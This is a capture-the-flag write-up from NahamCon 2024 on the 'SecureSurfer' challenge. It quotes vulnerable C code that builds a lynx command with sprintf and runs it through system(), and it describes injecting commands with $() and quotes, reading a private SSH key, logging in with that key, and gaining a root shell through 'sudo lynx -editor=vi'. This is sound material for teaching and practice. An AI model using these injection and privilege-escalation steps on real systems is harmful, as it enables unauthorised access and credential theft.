Nahamcon 2024


Solved by : thewhiteh4t

  • we are provided with SSH access and a C source code file
  • it is a simple C program which contains some cases and a surf function
  • surf function passes our input without much input validation to lynx a console based browser tool
  • 5 options have predefined inputs but in 6th option we can provide our input
    case 6:
                        char url[1024];
                        printf("Online URL: ");
                        fgets(url, sizeof(url), stdin);
                        url[strcspn(url, "\n")] = 0; // Remove newline character
                        if (strstr(url, "https://") == NULL) {
                            printf("\nWe are secure here at the SecureSurfer! You must use https:// !\n");
                        } else {

    void surf(const char *url) {
        char command[512];
        sprintf(command, "/usr/local/bin/lynx --accept_all_cookies -cache=0 -restrictions=all '%s'", url);
        system("stty sane");
  • only requirement is that our input should contain https://
  • we can inject commands through our input by using $() and single quotes :

  • so we have command injection, kind of
  • now let’s try to drop to a shell :

  • we did get a shell but command output is blank, maybe due to how lynx works or some other reason but we can still explore and home dir of securesurfer contains a .ssh directory, so we can try to look for id_rsa
securesurfer@securesurfer:~$ cat .ssh/
authorized_keys  id_ecdsa         id_ecdsa.pub
  • fortunately with lynx we can read files directly!
  • now we can directly login and skip the browser on login
chmod 600 id_ecdsa
ssh -p 31252 securesurfer@challenge.nahamcon.com -i id_ecdsa

  • after looking into lynx for sometime I came across a useful option :
-editor=EDITOR    enable edit mode with specified editor
  • on the target box vi was available so we can run lynx with sudo and vi as our editor and drop into edit mode and try to launch a bash shell
  • we also need a local file for the editor
touch a
sudo lynx -editor=vi a
  • after getting inside lynx we need to press e to launch edit mode where vi takes over
  • and now we can simply use the following to get a shell :

Published on : 28 May 2024